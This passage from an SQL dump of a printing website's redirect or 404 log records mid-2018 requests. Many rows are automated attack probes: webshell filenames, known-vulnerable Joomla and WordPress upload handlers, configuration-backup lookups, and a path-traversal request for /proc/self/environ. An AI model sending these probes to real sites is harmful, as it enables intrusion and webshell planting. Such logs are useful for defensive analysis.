00:00:00',301),(13569,'http://ekvatorprint.com.ua/ekvatorprint.com.ua~',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-23 19:16:59','0000-00-00 00:00:00',301),(13570,'http://ekvatorprint.com.ua/ekvatorprint.com.ua copy.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 00:42:19','0000-00-00 00:00:00',301),(13571,'http://ekvatorprint.com.ua/jeffs_simple_cms/media_uploader/server/php/',NULL,'http://ekvatorprint.com.ua/jeffs_simple_cms/media_uploader/server/php/','',1,0,'2018-05-24 02:42:07','0000-00-00 00:00:00',301),(13572,'http://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/','',3,0,'2018-05-24 02:42:08','0000-00-00 00:00:00',301),(13573,'http://ekvatorprint.com.ua/Copy of ekvatorprint.com.ua',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 03:24:58','0000-00-00 00:00:00',301),(13574,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.save',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 06:12:37','0000-00-00 00:00:00',301),(13575,'http://ekvatorprint.com.ua/.ekvatorprint.com.ua.swp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 08:36:10','0000-00-00 00:00:00',301),(13576,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.swp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 11:02:05','0000-00-00 00:00:00',301),(13577,'http://ekvatorprint.com.ua/ekvatorprint.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 13:52:54','0000-00-00 00:00:00',301),(13578,'http://ekvatorprint.com.ua/ekvatorprint.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 16:27:29','0000-00-00 00:00:00',301),(13579,'http://ekvatorprint.com.ua/ekvatorprint.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-24 18:51:30','0000-00-00 00:00:00',301),(13580,'http://ekvatorprint.com.ua/members/page2.html',NULL,'http://ekvatorprint.com.ua','',1,0,'2018-05-25 11:41:46','0000-00-00 00:00:00',301),(13581,'http://ekvatorprint.com.ua/XxX.php',NULL,'','',4,0,'2018-05-28 03:12:19','0000-00-00 00:00:00',301),(13582,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/bot.php3.g',NULL,'','',4,0,'2018-05-28 03:12:21','0000-00-00 00:00:00',301),(13583,'http://ekvatorprint.com.ua/media/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:22','0000-00-00 00:00:00',301),(13584,'http://ekvatorprint.com.ua/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:24','0000-00-00 00:00:00',301),(13585,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',3,0,'2018-05-28 03:12:24','0000-00-00 00:00:00',301),(13586,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:24','0000-00-00 00:00:00',301),(13587,'http://ekvatorprint.com.ua/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',3,0,'2018-05-28 03:12:26','0000-00-00 00:00:00',301),(13588,'http://ekvatorprint.com.ua/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:26','0000-00-00 00:00:00',301),(13589,'http://ekvatorprint.com.ua/tmp/plupload/RxR.php',NULL,'','',2,0,'2018-05-28 03:12:27','0000-00-00 00:00:00',301),(13590,'http://ekvatorprint.com.ua/com_sexycontactform/fileupload/index.php',NULL,'','',4,0,'2018-05-28 03:12:30','0000-00-00 00:00:00',301),(13591,'http://ekvatorprint.com.ua/com_sexycontactform/fileupload/files/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:31','0000-00-00 00:00:00',301),(13592,'http://ekvatorprint.com.ua/xx.php.xxxjpg',NULL,'','',2,0,'2018-05-28 03:12:35','0000-00-00 00:00:00',301),(13593,'http://ekvatorprint.com.ua/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',6,0,'2018-05-28 03:12:35','0000-00-00 00:00:00',301),(13594,'http://ekvatorprint.com.ua/images/stories/xx.php.xxxjpg',NULL,'','',4,0,'2018-05-28 03:12:36','0000-00-00 00:00:00',301),(13595,'http://ekvatorprint.com.ua/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',6,0,'2018-05-28 03:12:36','0000-00-00 00:00:00',301),(13596,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:42','0000-00-00 00:00:00',301),(13597,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:44','0000-00-00 00:00:00',301),(13598,'http://ekvatorprint.com.ua/jwallpapers_files/plupload/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:46','0000-00-00 00:00:00',301),(13599,'http://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php',NULL,'','',3,0,'2018-05-28 03:12:51','0000-00-00 00:00:00',301),(13600,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/RxR__czndp.php',NULL,'','',1,0,'2018-05-28 03:12:53','0000-00-00 00:00:00',301),(13601,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:12:55','0000-00-00 00:00:00',301),(13602,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:12:58','0000-00-00 00:00:00',301),(13603,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:13:00','0000-00-00 00:00:00',301),(13604,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:13:00','0000-00-00 00:00:00',301),(13605,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:13:01','0000-00-00 00:00:00',301),(13606,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',2,0,'2018-05-28 03:13:02','0000-00-00 00:00:00',301),(13607,'http://ekvatorprint.com.ua/vehiculo_photos/server/php/',NULL,'http://ekvatorprint.com.ua/vehiculo_photos/server/php/','',1,0,'2018-05-28 09:40:21','0000-00-00 00:00:00',301),(13608,'http://ekvatorprint.com.ua/wp-content/themes/ut-strange/addpress/css/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/ut-strange/addpress/css/style.css','',3,0,'2018-05-28 18:46:33','0000-00-00 00:00:00',301),(13609,'http://ekvatorprint.com.ua/\'modulnye-kartiny\'',NULL,'\'%27https://www.google.tm/search?q=site&oq=site&aqs=chrome%27\'69i60l4j69i65.1945j0j7&sourceid=chrome&ie=UTF-8\'%27','',1,0,'2018-05-28 21:48:40','0000-00-00 00:00:00',301),(13610,'http://ekvatorprint.com.ua/jolokia',NULL,'','',1,0,'2018-05-29 15:32:25','0000-00-00 00:00:00',301),(13611,'http://ekvatorprint.com.ua/sizing.php',NULL,'','',2,0,'2018-05-30 02:01:11','0000-00-00 00:00:00',301),(13612,'http://ekvatorprint.com.ua/user/register/',NULL,'','',7,0,'2018-05-30 13:32:21','0000-00-00 00:00:00',301),(13613,'http://ekvatorprint.com.ua/Camille.php',NULL,'','',2,0,'2018-05-31 21:34:30','0000-00-00 00:00:00',301),(13614,'http://ekvatorprint.com.ua/pinfon.php',NULL,'','',2,0,'2018-06-01 07:30:18','0000-00-00 00:00:00',301),(13615,'http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в экваторпринт-fill-756x167.png',NULL,'','',1,0,'2018-06-03 17:55:56','0000-00-00 00:00:00',301),(13616,'http://ekvatorprint.com.ua/kup.php?u=1',NULL,'','',2,0,'2018-06-06 16:51:59','0000-00-00 00:00:00',301),(13617,'http://ekvatorprint.com.ua/templates/ja_purity_ii/index.php',NULL,'','',2,0,'2018-06-06 17:57:24','0000-00-00 00:00:00',301),(13618,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/css.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/css.php','',1,0,'2018-06-08 02:32:37','0000-00-00 00:00:00',301),(13619,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/xxx.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/xxx.php','',1,0,'2018-06-08 02:32:38','0000-00-00 00:00:00',301),(13620,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/op.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/op.php','',1,0,'2018-06-08 02:32:41','0000-00-00 00:00:00',301),(13621,'http://ekvatorprint.com.ua/Martina.php',NULL,'','',2,0,'2018-06-09 00:16:13','0000-00-00 00:00:00',301),(13622,'http://ekvatorprint.com.ua/forum/main-forum',NULL,'ekvatorprint.com.ua/forum/main-forum','',1,0,'2018-06-09 21:12:45','0000-00-00 00:00:00',301),(13623,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/b3.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/b3.php','',1,0,'2018-06-11 02:26:44','0000-00-00 00:00:00',301),(13624,'http://ekvatorprint.com.ua/wp-content/themes/highlight/lib/utils/upload-handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/highlight/lib/utils/upload-handler.php','',1,0,'2018-06-11 05:22:29','0000-00-00 00:00:00',301),(13625,'http://ekvatorprint.com.ua/banner-printing-https',NULL,'','',3,0,'2018-06-11 06:30:48','0000-00-00 00:00:00',301),(13626,'http://ekvatorprint.com.ua/banner-printing&amp',NULL,'','',6,0,'2018-06-11 06:30:48','0000-00-00 00:00:00',301),(13627,'http://ekvatorprint.com.ua/msd1.24.4/main.php',NULL,'','',1,0,'2018-06-14 12:33:40','0000-00-00 00:00:00',301),(13628,'http://ekvatorprint.com.ua/magento/',NULL,'','',2,0,'2018-06-15 18:40:49','0000-00-00 00:00:00',301),(13629,'http://ekvatorprint.com.ua/wp-admin/includes/fdsj399jdsf.php',NULL,'','',1,0,'2018-06-16 12:04:32','0000-00-00 00:00:00',301),(13630,'http://ekvatorprint.com.ua/core/CHANGELOG.txt',NULL,'','',2,0,'2018-06-18 03:53:21','0000-00-00 00:00:00',301),(13631,'http://ekvatorprint.com.ua/su?0.9436044970144681',NULL,'','',1,0,'2018-06-19 07:59:04','0000-00-00 00:00:00',301),(13632,'http://ekvatorprint.com.ua/su?0.9159496424561411',NULL,'','',1,0,'2018-06-19 07:59:14','0000-00-00 00:00:00',301),(13633,'http://ekvatorprint.com.ua/su?0.15641879017102367',NULL,'','',1,0,'2018-06-19 08:13:57','0000-00-00 00:00:00',301),(13634,'http://ekvatorprint.com.ua/su?0.7519863389788501',NULL,'','',1,0,'2018-06-19 10:35:43','0000-00-00 00:00:00',301),(13635,'http://ekvatorprint.com.ua/su?0.31938395628215455',NULL,'','',1,0,'2018-06-19 10:35:49','0000-00-00 00:00:00',301),(13636,'http://ekvatorprint.com.ua/su?0.9601243547012892',NULL,'','',1,0,'2018-06-19 10:36:15','0000-00-00 00:00:00',301),(13637,'http://ekvatorprint.com.ua/su?0.7464651339548243',NULL,'','',1,0,'2018-06-19 10:41:06','0000-00-00 00:00:00',301),(13638,'http://ekvatorprint.com.ua/su?0.4353324963239489',NULL,'','',1,0,'2018-06-19 10:41:11','0000-00-00 00:00:00',301),(13639,'http://ekvatorprint.com.ua/su?0.770572452115043',NULL,'','',1,0,'2018-06-19 10:41:29','0000-00-00 00:00:00',301),(13640,'http://ekvatorprint.com.ua/su?0.583914845118098',NULL,'','',1,0,'2018-06-20 09:29:38','0000-00-00 00:00:00',301),(13641,'http://ekvatorprint.com.ua/su?0.23949499485494918',NULL,'','',1,0,'2018-06-20 09:29:42','0000-00-00 00:00:00',301),(13642,'http://ekvatorprint.com.ua/templates/ltemplate/ltemplate.php',NULL,'ekvatorprint.com.ua','',3,0,'2018-06-20 22:13:10','0000-00-00 00:00:00',301),(13643,'http://ekvatorprint.com.ua/wp-includes/Text/Diff/Engine/cache.php?ms-load=rt7hy8pu',NULL,'','',1,0,'2018-06-21 11:37:40','0000-00-00 00:00:00',301),(13644,'http://ekvatorprint.com.ua/wp-content/indes.php',NULL,'','',2,0,'2018-06-22 01:50:40','0000-00-00 00:00:00',301),(13645,'http://ekvatorprint.com.ua/wp-content/plugins/log.php',NULL,'','',2,0,'2018-06-22 15:35:01','0000-00-00 00:00:00',301),(13646,'http://ekvatorprint.com.ua/index.php?option=com_user&view=reset&layout=confirm',NULL,'','',2,0,'2018-06-22 16:37:33','0000-00-00 00:00:00',301),(13647,'http://ekvatorprint.com.ua/banner-printing/RK=2/RS=i_d0q0fd_Seq3ro4PeBJtg2xgnw-',NULL,'','',1,0,'2018-06-24 21:01:51','0000-00-00 00:00:00',301),(13648,'http://ekvatorprint.com.ua/wp-version.php',NULL,'','',1,0,'2018-06-26 04:35:25','0000-00-00 00:00:00',301),(13649,'http://ekvatorprint.com.ua/joomla/',NULL,'','',1,0,'2018-06-26 10:08:46','0000-00-00 00:00:00',301),(13650,'http://ekvatorprint.com.ua/priv.php',NULL,'','',3,0,'2018-06-26 10:08:47','0000-00-00 00:00:00',301),(13651,'http://ekvatorprint.com.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php',NULL,'','',3,0,'2018-06-26 10:08:47','0000-00-00 00:00:00',301),(13652,'http://ekvatorprint.com.ua/priv\'..\'',NULL,'','',1,0,'2018-06-26 10:08:49','0000-00-00 00:00:00',301),(13653,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/priv.php.j',NULL,'','',1,0,'2018-06-26 10:08:50','0000-00-00 00:00:00',301),(13654,'http://ekvatorprint.com.ua/media/priv.php',NULL,'','',1,0,'2018-06-26 10:08:51','0000-00-00 00:00:00',301),(13655,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',4,0,'2018-06-26 10:08:52','0000-00-00 00:00:00',301),(13656,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/priv.php',NULL,'','',1,0,'2018-06-26 10:08:53','0000-00-00 00:00:00',301),(13657,'http://ekvatorprint.com.ua/modules/mod_socialpinboard_menu/images/socialpinboard/temp/				<li><a href=\"/index.php',NULL,'','',2,0,'2018-06-26 10:08:54','0000-00-00 00:00:00',301),(13658,'http://ekvatorprint.com.ua/contactar',NULL,'','',1,0,'2018-06-26 10:08:57','0000-00-00 00:00:00',301),(13659,'http://ekvatorprint.com.ua/iletisim',NULL,'','',1,0,'2018-06-26 10:08:58','0000-00-00 00:00:00',301),(13660,'http://ekvatorprint.com.ua/contato',NULL,'','',1,0,'2018-06-26 10:08:59','0000-00-00 00:00:00',301),(13661,'http://ekvatorprint.com.ua/contactos',NULL,'','',1,0,'2018-06-26 10:09:01','0000-00-00 00:00:00',301),(13662,'http://ekvatorprint.com.ua/index.php/contact',NULL,'','',2,0,'2018-06-26 10:09:01','0000-00-00 00:00:00',301),(13663,'http://ekvatorprint.com.ua/index.php/contactus',NULL,'','',2,0,'2018-06-26 10:09:02','0000-00-00 00:00:00',301),(13664,'http://ekvatorprint.com.ua/index.php/contact-us',NULL,'','',2,0,'2018-06-26 10:09:02','0000-00-00 00:00:00',301),(13665,'http://ekvatorprint.com.ua/index.php/contacto',NULL,'','',2,0,'2018-06-26 10:09:03','0000-00-00 00:00:00',301),(13666,'http://ekvatorprint.com.ua/index.php/iletisim',NULL,'','',2,0,'2018-06-26 10:09:04','0000-00-00 00:00:00',301),(13667,'http://ekvatorprint.com.ua/index.php/kontakty',NULL,'','',2,0,'2018-06-26 10:09:04','0000-00-00 00:00:00',301),(13668,'http://ekvatorprint.com.ua/index.php/contatti',NULL,'','',2,0,'2018-06-26 10:09:05','0000-00-00 00:00:00',301),(13669,'http://ekvatorprint.com.ua/index.php/contactar',NULL,'','',2,0,'2018-06-26 10:09:05','0000-00-00 00:00:00',301),(13670,'http://ekvatorprint.com.ua/index.php/contato',NULL,'','',2,0,'2018-06-26 10:09:06','0000-00-00 00:00:00',301),(13671,'http://ekvatorprint.com.ua/index.php/contactenos',NULL,'','',2,0,'2018-06-26 10:09:06','0000-00-00 00:00:00',301),(13672,'http://ekvatorprint.com.ua/index.php/contactos',NULL,'','',2,0,'2018-06-26 10:09:08','0000-00-00 00:00:00',301),(13673,'http://ekvatorprint.com.ua/tmp/plupload/priv.php',NULL,'','',1,0,'2018-06-26 10:09:09','0000-00-00 00:00:00',301),(13674,'http://ekvatorprint.com.ua/com_sexycontactform/fileupload/files/priv.php',NULL,'','',1,0,'2018-06-26 10:09:11','0000-00-00 00:00:00',301),(13675,'http://ekvatorprint.com.ua/images/stories/priv.php.xxxjpg',NULL,'','',2,0,'2018-06-26 10:09:12','0000-00-00 00:00:00',301),(13676,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/priv.php',NULL,'','',1,0,'2018-06-26 10:09:13','0000-00-00 00:00:00',301),(13677,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/priv.php',NULL,'','',1,0,'2018-06-26 10:09:14','0000-00-00 00:00:00',301),(13678,'http://ekvatorprint.com.ua/jwallpapers_files/plupload/priv.php',NULL,'','',1,0,'2018-06-26 10:09:15','0000-00-00 00:00:00',301),(13679,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/priv.php',NULL,'','',1,0,'2018-06-26 10:09:17','0000-00-00 00:00:00',301),(13680,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:18','0000-00-00 00:00:00',301),(13681,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:19','0000-00-00 00:00:00',301),(13682,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:20','0000-00-00 00:00:00',301),(13683,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:21','0000-00-00 00:00:00',301),(13684,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:22','0000-00-00 00:00:00',301),(13685,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:23','0000-00-00 00:00:00',301),(13686,'http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-06-26 10:09:24','0000-00-00 00:00:00',301),(13687,'http://ekvatorprint.com.ua/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1',NULL,'','',1,0,'2018-06-26 10:09:24','0000-00-00 00:00:00',301),(13688,'http://ekvatorprint.com.ua/images/biblestudy/media/priv.php',NULL,'','',1,0,'2018-06-26 10:09:25','0000-00-00 00:00:00',301),(13689,'http://ekvatorprint.com.ua/prestashop/',NULL,'','',1,0,'2018-06-26 15:22:42','0000-00-00 00:00:00',301),(13690,'http://ekvatorprint.com.ua/su?0.33169158178064195',NULL,'','',1,0,'2018-06-26 15:24:26','0000-00-00 00:00:00',301),(13691,'http://ekvatorprint.com.ua/wp-includes/indes.php',NULL,'','',2,0,'2018-06-27 08:41:42','0000-00-00 00:00:00',301),(13692,'http://ekvatorprint.com.ua/su?0.8732109160137975',NULL,'','',1,0,'2018-06-27 11:21:00','0000-00-00 00:00:00',301),(13693,'http://ekvatorprint.com.ua/su?0.6797782783677335',NULL,'','',1,0,'2018-06-27 11:21:43','0000-00-00 00:00:00',301),(13694,'http://ekvatorprint.com.ua/su?0.9291047090881964',NULL,'','',1,0,'2018-06-29 06:01:47','0000-00-00 00:00:00',301),(13695,'http://ekvatorprint.com.ua/outdoor-advertising/outdoor-advertising',NULL,'','',33,0,'2018-06-29 16:27:48','0000-00-00 00:00:00',301),(13696,'http://ekvatorprint.com.ua/images/smilies/szatielzw2.jpg\"); display: block',NULL,'','',1,0,'2018-06-30 14:40:18','0000-00-00 00:00:00',301),(13697,'http://ekvatorprint.com.ua/wp-content/yt.php',NULL,'','',1,0,'2018-07-01 18:11:41','0000-00-00 00:00:00',301),(13698,'http://ekvatorprint.com.ua/wp-admin/yt.php',NULL,'','',2,0,'2018-07-02 07:54:25','0000-00-00 00:00:00',301),(13699,'http://ekvatorprint.com.ua/',NULL,'','',1,0,'2018-07-04 08:38:52','0000-00-00 00:00:00',301),(13700,'http://ekvatorprint.com.ua/te3/signup.php',NULL,'','',3,0,'2018-07-04 09:02:43','0000-00-00 00:00:00',301),(13701,'http://ekvatorprint.com.ua/files.tar.gz',NULL,'','',1,0,'2018-07-04 20:32:47','0000-00-00 00:00:00',301),(13702,'http://ekvatorprint.com.ua/wp-content/plugins/wp-formgenerator/uploads/php/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-formgenerator/uploads/php/','',3,0,'2018-07-05 07:44:07','0000-00-00 00:00:00',301),(13703,'http://ekvatorprint.com.ua/wp-icoud.php',NULL,'','',2,0,'2018-07-06 03:35:19','0000-00-00 00:00:00',301),(13704,'http://ekvatorprint.com.ua/sys.php.php',NULL,'','',2,0,'2018-07-06 15:09:56','0000-00-00 00:00:00',301),(13705,'http://ekvatorprint.com.ua/code.php.php',NULL,'','',2,0,'2018-07-06 21:12:27','0000-00-00 00:00:00',301),(13706,'http://ekvatorprint.com.ua/mobile_detect.php',NULL,'','',2,0,'2018-07-08 09:20:56','0000-00-00 00:00:00',301),(13707,'http://ekvatorprint.com.ua/restore.tar.gz',NULL,'','',1,0,'2018-07-08 17:37:16','0000-00-00 00:00:00',301),(13708,'http://ekvatorprint.com.ua/component/kunena/',NULL,'ekvatorprint.com.ua/component/kunena/','',1,0,'2018-07-08 21:47:04','0000-00-00 00:00:00',301),(13709,'http://ekvatorprint.com.ua/plugins/system/plugin_googlemap2_proxy.php?url=',NULL,'','',2,0,'2018-07-08 22:35:19','0000-00-00 00:00:00',301),(13710,'http://ekvatorprint.com.ua/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',NULL,'','',1,0,'2018-07-09 00:25:37','0000-00-00 00:00:00',301),(13711,'http://ekvatorprint.com.ua/application/configs/application.ini',NULL,'','',2,0,'2018-07-09 22:43:45','0000-00-00 00:00:00',301),(13712,'http://ekvatorprint.com.ua/rxr.php?rxr',NULL,'','',4,0,'2018-07-09 22:44:37','0000-00-00 00:00:00',301),(13713,'http://ekvatorprint.com.ua/vulns.php',NULL,'','',2,0,'2018-07-09 22:45:05','0000-00-00 00:00:00',301),(13714,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/tool/bot.php3.g',NULL,'','',2,0,'2018-07-09 22:45:19','0000-00-00 00:00:00',301),(13715,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/rxrking.php3.g?rxr',NULL,'','',2,0,'2018-07-09 22:45:45','0000-00-00 00:00:00',301),(13716,'http://ekvatorprint.com.ua/media/izo.PhP.txt',NULL,'','',1,0,'2018-07-09 22:46:17','0000-00-00 00:00:00',301),(13717,'http://ekvatorprint.com.ua/media/izox.phP',NULL,'','',1,0,'2018-07-09 22:46:22','0000-00-00 00:00:00',301),(13718,'http://ekvatorprint.com.ua/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php',NULL,'','',1,0,'2018-07-09 22:46:48','0000-00-00 00:00:00',301),(13719,'http://ekvatorprint.com.ua/zXAttacker.php?X=Attacker',NULL,'','',1,0,'2018-07-09 22:47:06','0000-00-00 00:00:00',301),(13720,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/error.php',NULL,'','',1,0,'2018-07-09 22:47:22','0000-00-00 00:00:00',301),(13721,'http://ekvatorprint.com.ua/tmp/plupload/izo.php',NULL,'','',1,0,'2018-07-09 22:48:36','0000-00-00 00:00:00',301),(13722,'http://ekvatorprint.com.ua/tmp/plupload/izo.phP',NULL,'','',1,0,'2018-07-09 22:48:44','0000-00-00 00:00:00',301),(13723,'http://ekvatorprint.com.ua/tmp/plupload/izo.phtml',NULL,'','',1,0,'2018-07-09 22:48:52','0000-00-00 00:00:00',301),(13724,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../izoc.php',NULL,'','',1,0,'2018-07-09 22:49:09','0000-00-00 00:00:00',301),(13725,'http://ekvatorprint.com.ua/components/izoc.php',NULL,'','',1,0,'2018-07-09 22:49:14','0000-00-00 00:00:00',301),(13726,'http://ekvatorprint.com.ua/com_sexycontactform/fileupload/files/error.php',NULL,'','',1,0,'2018-07-09 22:49:23','0000-00-00 00:00:00',301),(13727,'http://ekvatorprint.com.ua/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2018-07-09 22:50:06','0000-00-00 00:00:00',301),(13728,'http://ekvatorprint.com.ua/modules/megamenu/uploadify/error.php',NULL,'','',1,0,'2018-07-09 22:50:10','0000-00-00 00:00:00',301),(13729,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/error.php',NULL,'','',1,0,'2018-07-09 22:50:19','0000-00-00 00:00:00',301),(13730,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/error.php',NULL,'','',1,0,'2018-07-09 22:50:28','0000-00-00 00:00:00',301),(13731,'http://ekvatorprint.com.ua/jwallpapers_files/plupload/error.php',NULL,'','',1,0,'2018-07-09 22:50:39','0000-00-00 00:00:00',301),(13732,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/error.php',NULL,'','',1,0,'2018-07-09 22:51:08','0000-00-00 00:00:00',301),(13733,'http://ekvatorprint.com.ua/administrator/components/com_maian15/charts/tmp-upload-images/izoc.php',NULL,'','',1,0,'2018-07-09 22:51:31','0000-00-00 00:00:00',301),(13734,'http://ekvatorprint.com.ua/configuration.php-n',NULL,'','',1,0,'2018-07-09 23:44:17','0000-00-00 00:00:00',301),(13735,'http://ekvatorprint.com.ua/configuration.php-dist',NULL,'','',1,0,'2018-07-09 23:44:18','0000-00-00 00:00:00',301),(13736,'http://ekvatorprint.com.ua/configuration.php-backup1.txt',NULL,'','',1,0,'2018-07-09 23:44:20','0000-00-00 00:00:00',301),(13737,'http://ekvatorprint.com.ua/configuration.php fix.txt',NULL,'','',1,0,'2018-07-09 23:44:21','0000-00-00 00:00:00',301),(13738,'http://ekvatorprint.com.ua/configuration',NULL,'','',1,0,'2018-07-09 23:44:21','0000-00-00 00:00:00',301),(13739,'http://ekvatorprint.com.ua/configuration.phpOLD',NULL,'','',1,0,'2018-07-09 23:44:27','0000-00-00 00:00:00',301),(13740,'http://ekvatorprint.com.ua/configuration.phpold',NULL,'','',1,0,'2018-07-09 23:44:28','0000-00-00 00:00:00',301),(13741,'http://ekvatorprint.com.ua/configuration.phpnew',NULL,'','',1,0,'2018-07-09 23:44:29','0000-00-00 00:00:00',301),(13742,'http://ekvatorprint.com.ua/configuration.txt',NULL,'','',1,0,'2018-07-09 23:44:29','0000-00-00 00:00:00',301),(13743,'http://ekvatorprint.com.ua/configuration.phpa',NULL,'','',1,0,'2018-07-09 23:44:30','0000-00-00 00:00:00',301),(13744,'http://ekvatorprint.com.ua/configuration.old',NULL,'','',1,0,'2018-07-09 23:44:31','0000-00-00 00:00:00',301),(13745,'http://ekvatorprint.com.ua/configuration.php.bak_old_host',NULL,'','',1,0,'2018-07-09 23:44:32','0000-00-00 00:00:00',301),(13746,'http://ekvatorprint.com.ua/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00',NULL,'http://www.ekvatorprint.com.ua/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00','',1,0,'2018-07-10 22:15:09','0000-00-00 00:00:00',301),(13747,'http://ekvatorprint.com.ua/modules/mod_cmscore/fuf.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-07-12 13:48:49','0000-00-00 00:00:00',301),(13748,'http://ekvatorprint.com.ua/www.jsminingstatistics.com',NULL,'www.jsminingstatistics.com','',1,0,'2018-07-12 14:23:39','0000-00-00 00:00:00',301),(13749,'http://ekvatorprint.com.ua/sites/default/files/payload.php',NULL,'','',7,0,'2018-07-13 05:00:01','0000-00-00 00:00:00',301),(13750,'http://ekvatorprint.com.ua/images/modulniekartini/мк-129.png',NULL,'','',1,0,'2018-07-13 09:50:14','0000-00-00 00:00:00',301),(13751,'http://ekvatorprint.com.ua/bb87dcbbaf24376a16069e4e3b518a8a',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2018-07-13 10:24:13','0000-00-00 